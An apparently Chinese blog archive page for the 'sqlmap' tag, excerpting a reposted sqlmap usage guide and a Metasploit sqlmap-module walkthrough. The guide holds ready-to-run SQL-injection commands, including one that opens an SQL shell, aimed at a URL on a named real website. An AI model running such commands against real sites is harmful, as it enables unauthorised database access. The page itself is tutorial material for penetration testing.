存档

文章标签 ‘sqlmap’

[zz]sqlmap简单中文说明

2010年3月4日 root     2,693 views 没有评论

著名黑客注射工具sqlmap的使用方法

sqlmap简单中文说明

这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1″

阅读全文…

[zz]use Metasploit’s sqlmap auxiliary module launch msfconsole

2010年1月3日 admin     3,054 views 没有评论

From:http://hi.baidu.com/p3rlish

To use Metasploit’s sqlmap auxiliary module launch msfconsole and follow
the example below.

Note that if you are willing to run Metasploit’s sqlmap auxiliary module on
through WMAP framework you first need to install sqlmap on your system or
add its file system path to the PATH environment variable.

$ ./msfconsole

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|

=[ msf v3.2-testing
+ — –=[ 308 exploits – 173 payloads
+ — –=[ 20 encoders – 6 nops
=[ 75 aux
阅读全文…

分类: 渗透测试 标签: ,